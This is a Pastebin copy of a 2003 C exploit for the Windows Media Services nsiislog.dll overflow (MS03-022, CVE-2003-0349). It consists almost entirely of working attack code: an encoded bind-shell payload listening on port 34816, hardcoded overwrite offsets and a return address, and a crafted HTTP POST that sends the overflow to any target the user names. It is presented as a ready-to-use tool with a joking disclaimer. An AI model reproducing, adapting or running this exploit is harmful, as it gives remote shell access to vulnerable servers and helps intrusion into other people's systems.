FlyFar

Microsoft Windows Media Services - Remote (MS03-022) - CVE-2003-0349

Jan 27th, 2024
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.99 KB | Cybersecurity | 0 0
  1. // Windows Media Services Remote Command Execution #2
  2. // v. 1.0 beta
  3. // (c) firew0rker  //tN  [The N0b0D1eS]
  4.  
  5. #include <stdio.h>
  6. #include <string.h>
  7. #include <stdlib.h>
  8.  
  9. #ifdef WIN32
  10. #include <winsock.h>
  11. #pragma comment(lib, "wsock32")
  12. #else
  13. #include <sys/socket.h>
  14. #include <sys/types.h>
  15. #include <netinet/in.h>
  16. #include <arpa/inet.h>
  17. #include <netdb.h>
  18. #include <unistd.h>
  19. #define SOCKET int
  20. #define DWORD uint32_t
  21. #define ULONG unsigned long
  22. #define INVALID_SOCKET -1
  23. #define SOCKET_ERROR -1
  24. #define closesocket close
  25. #endif
  26.  
  27. char shellcode[]=
  28. //"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨
  29. "\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
  30. "\xff\x5b\x81\xeb\x4d\x43\x22\x11"
  31. "\x8b\xc3\x05\x66\x43\x22\x11\x66"
  32. "\xb9\x15\x03\x80\x30\xfb\x40\x67"
  33. "\xe2\xf9\x33\xa3\xf9\xfb\x72\x66"
  34. "\x53\x06\x04\x04\x76\x66\x37\x06"
  35. "\x04\x04\xa8\x40\xf6\xbd\xd9\xea"
  36. "\xf8\x66\x53\x06\x04\x04\xa8\x93"
  37. "\xfb\xfb\x04\x04\x13\x91\xfa\xfb"
  38. "\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e"
  39. "\x53\x06\x04\x04\xab\x04\x6e\x37"
  40. "\x06\x04\x04\xf0\x3b\xf4\x7f\xbe"
  41. "\xfa\xfb\xfb\x76\x66\x3b\x06\x04"
  42. "\x04\xa8\x40\xba\xbd\xd9\xea\xf8"
  43. "\x66\x53\x06\x04\x04\xa8\xab\x13"
  44. "\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05"
  45. "\x04\x04\xab\x93\xfa\xfa\xfb\xfb"
  46. "\x04\x6e\x4b\x06\x04\x04\xc8\x20"
  47. "\xa8\xa8\xa8\x91\xfd\x91\xfa\x91"
  48. "\xf9\x04\x6e\x3b\x06\x04\x04\x72"
  49. "\x7e\xa7\x05\x04\x04\x9d\x3c\x7e"
  50. "\x9f\x05\x04\x04\xf9\xfb\x9d\x3c"
  51. "\x7e\x9d\x05\x04\x04\x73\xfb\x3c"
  52. "\x7e\x93\x05\x04\x04\xfb\xfb\xfb"
  53. "\xfb\x76\x66\x9f\x05\x04\x04\x91"
  54. "\xeb\xa8\x04\x4e\xa7\x05\x04\x04"
  55. "\x04\x6e\x47\x06\x04\x04\xf0\x3b"
  56. "\x8f\xe8\x76\x6e\x9c\x05\x04\x04"
  57. "\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46"
  58. "\xfb\xfb\xfb\x10\x2f\x91\xfa\x04"
  59. "\x4e\xa7\x05\x04\x04\x04\x6e\x43"
  60. "\x06\x04\x04\xf0\x3b\xf4\x7e\x5e"
  61. "\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04"
  62. "\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b"
  63. "\x05\x04\x04\xab\x76\x7e\x9f\x05"
  64. "\x04\x04\xab\x04\x4e\xa7\x05\x04"
  65. "\x04\x04\x6e\x4f\x06\x04\x04\x72"
  66. "\x7e\xa3\x05\x04\x04\x07\x76\x46"
  67. "\xf3\x05\x04\x04\xc8\x3b\x42\xbf"
  68. "\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf"
  69. "\x05\x04\x04\xfb\xfa\xfb\xfb\x70"
  70. "\x7e\xa3\x05\x04\x04\x72\x7e\xbf"
  71. "\x05\x04\x04\x72\x7e\xb3\x05\x04"
  72. "\x04\x72\x7e\xbb\x05\x04\x04\x3c"
  73. "\x7e\xf3\x05\x04\x04\xbf\xfb\xfb"
  74. "\xfb\xc8\x20\x76\x7e\x03\x06\x04"
  75. "\x04\xab\x76\x7e\xf3\x05\x04\x04"
  76. "\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3"
  77. "\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9"
  78. "\xea\xf8\x7e\x53\x06\x04\x04\xab"
  79. "\xa8\x04\x6e\x3f\x06\x04\x04\x04"
  80. "\x4e\xa3\x05\x04\x04\x04\x6e\x57"
  81. "\x06\x04\x04\x12\xa0\x04\x04\x04"
  82. "\x04\x6e\x33\x06\x04\x04\x13\x76"
  83. "\xfa\xfb\xfb\x33\xef\xfb\xfb\xac"
  84. "\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7"
  85. "\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe"
  86. "\xd9\xea\xf8\xff\xdf\x78\x3f\xff"
  87. "\xab\x9f\x9c\x04\xcd\xfb\xfb\x72"
  88. "\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a"
  89. "\xd7\xdf\xd8\xbe\xd9\xea\x43\xac"
  90. "\xbe\xd9\xea\xf8\xff\xdf\x78\x3f"
  91. "\xff\x72\xbe\x07\x9f\x9c\x72\xdd"
  92. "\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4"
  93. "\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d"
  94. "\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e"
  95. "\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa"
  96. "\xfb\x10\x19\x72\x86\x0b\x72\x8e"
  97. "\x17\x70\x86\xf7\x42\x6d\xfb\xfb"
  98. "\xfb\xc9\x3b\x09\x55\x72\x86\x0f"
  99. "\x70\x34\xd0\xb6\xf7\x70\xad\x83"
  100. "\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6"
  101. "\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b"
  102. "\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe"
  103. "\x78\x3f\xff\x10\xf1\xa2\x78\x38"
  104. "\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0"
  105. "\xb9\xe3\x8e\xf9\x10\xb8\x70\x89"
  106. "\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d"
  107. "\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b"
  108. "\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb"
  109. "\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6"
  110. "\xf7\x70\xa6\xeb\x72\xf8\x78\x96"
  111. "\xeb\xff\x70\x8e\x17\x7b\xc2\xfb"
  112. "\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb"
  113. "\x78\x3f\xff\xa5\xa4\x32\x39\xf7"
  114. "\xfb\x70\x86\x0b\x12\x99\x04\x04"
  115. "\x04\x33\xfb\xfb\xfb\x70\xbe\xeb"
  116. "\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb"
  117. "\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32"
  118. "\x38\xb7\x94\x9a\x9f\xb7\x92\x99"
  119. "\x89\x9a\x89\x82\xba\xfb\xbe\x83"
  120. "\x92\x8f\xab\x89\x94\x98\x9e\x88"
  121. "\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e"
  122. "\xab\x89\x94\x98\x9e\x88\x88\xba"
  123. "\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9"
  124. "\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba"
  125. "\xa8\x94\x98\x90\x9e\x8f\xba\xfb"
  126. "\x99\x92\x95\x9f\xfb\x97\x92\x88"
  127. "\x8f\x9e\x95\xfb\x9a\x98\x98\x9e"
  128. "\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f"
  129. "\x9a\x89\x8f\x8e\x8b\xfb\x98\x97"
  130. "\x94\x88\x9e\x88\x94\x98\x90\x9e"
  131. "\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9"
  132. "\xc4\xfc\xff\xff\x74\xf9\x75\xf7";
  133.  
  134.  
  135. const DWORD default_EIP_pos = 9992; //¯®«®¦¥­¨¥ EIP ¢ ¡ãä¥à¥ (sploit)
  136. const DWORD default_EBX_points_to = 9988; //㪠§ â¥«ì ¢ EBX ®â­®á¨â¥«ì­® sploit
  137. //const DWORD default_EIP_value = 0x77F8441B; //¯® íâ®¬ã  ¤à. ¤.¡. JMP EDX, ¢ ¤ ­­®¬ á«ãç ¥ íâ® ¢ ntdll.dll
  138. const DWORD default_EIP_value = 0x40F01333;
  139. //const default_EDX_points_to = 0x1000; //íâ® ­¥ ¯à¨£®¤¨«®áì
  140. char *nsiislog_default = "/scripts/nsiislog.dll";
  141. char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
  142. char sploitbuf[sizeof(sploit)*2];
  143.  
  144. void usage(char* argv[])
  145. {
  146.        printf("Dicklamer (: "
  147.     "We are not responsible for the illegal use of this software.\n"
  148.     "Description: Binds shell to port 34816 (or higher if port busy).\n"
  149.     "Usage: "
  150.     "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n"
  151.     "Supported target(s):\n"
  152.     "Windows version\t\t\t\tnsiislog.dll version\n"
  153.     "------------------------------------------------------------\n"
  154.     "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]);
  155.        exit(0);
  156. }
  157.  
  158. int main(int argc, char* argv[])
  159. {
  160. #ifdef WIN32
  161.     WSADATA wsaData;        
  162. #endif
  163.     int target_port = 80;
  164.     char *nsiislog = nsiislog_default;
  165.     int     nArgIndex;
  166.  
  167.     if (argc<2) usage(argv);
  168.     nArgIndex = 1;
  169.     while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
  170.     {
  171.         switch (argv[nArgIndex++][1])
  172.         {
  173.         case 'p':
  174.         case 'P':
  175.             target_port = atoi(argv[nArgIndex++]);
  176.             continue;
  177.         case 'r':
  178.         case 'R':
  179.             nsiislog = argv[nArgIndex++];
  180.             continue;
  181.         default:
  182.             usage(argv);
  183.         }
  184.     }
  185.    
  186.     try {
  187. #ifdef WIN32
  188.         WSAStartup(0x0101, &wsaData);
  189. #endif
  190.         SOCKET s = socket(AF_INET,SOCK_STREAM,0);
  191.         if (s == INVALID_SOCKET) throw("No socket");
  192.         sockaddr_in addr;
  193.        
  194.         //Ž¯à¥¤¥«ï¥¬  ¤à¥á á¥à¢ ª
  195.         ULONG iaddr = inet_addr(argv[1]);
  196.         if (iaddr == INADDR_NONE) {//€¤à¥á - ¨¬ï á¥à¢ ª
  197.             hostent *ph = gethostbyname(argv[1]);
  198.             if (!ph) throw("Cant resolve hostname");
  199.             memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
  200.         } else {//€¤à¥á - IP
  201.             memcpy(&addr.sin_addr.s_addr,&iaddr,4);
  202.         };
  203.        
  204.         addr.sin_family = AF_INET;
  205.         addr.sin_port   = htons(target_port);
  206.         int sizeofaddr=sizeof(addr);
  207.  
  208. char *req = "MX_STATS_LogLine: ";
  209. strcpy(sploit, req);
  210. memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
  211. //memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
  212. memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
  213. //¯à¨ ¯¥à¥å®¤¥ ­  EIP, EBX ¡ã¤¥â 㪠§ë¢ âì ­  ¯®á«¥¤­¨© DWORD ­ 襣® § ¯à®á , £¤¥ JZ/JNZ
  214. memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);
  215.        
  216.         /*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
  217.         sploit[sizeof(sploit)-1] = 0;
  218.        
  219.   if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");
  220.  
  221.         sprintf(sploitbuf,
  222.             "POST %s HTTP/1.0\r\n"
  223.             "Accept: */*\r\n"
  224.             "User-Agent: NSPlayer/4.1.0.3917\r\n"
  225.             "Content-Type: text/plain\r\n"
  226.             "Content-Length: %i\r\n"
  227.             "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"
  228.             "\r\n%s\r\n",
  229.             nsiislog,strlen(sploit),sploit);
  230.        
  231.         int snd=send(s,sploitbuf,strlen(sploitbuf),0);
  232.         if (snd == strlen(sploitbuf)) printf("Target exploited.\n");
  233.             else throw("Cant send exploit");
  234.         closesocket(s);
  235.     }
  236.     catch (char *errmsg)
  237.     {
  238.        
  239.         printf("%s\n",errmsg);
  240.         return -1;
  241.     }
  242.     catch (int err_n)
  243.     {
  244.         printf("error %i\n",err_n);
  245.         return err_n;
  246.     }
  247. #ifdef WIN32
  248.     WSACleanup();
  249. #endif
  250.     return 0;
  251. }
  252.  
  253.  
  254. // milw0rm.com [2003-07-01]
  255.            
Add Comment
Please, Sign In to add comment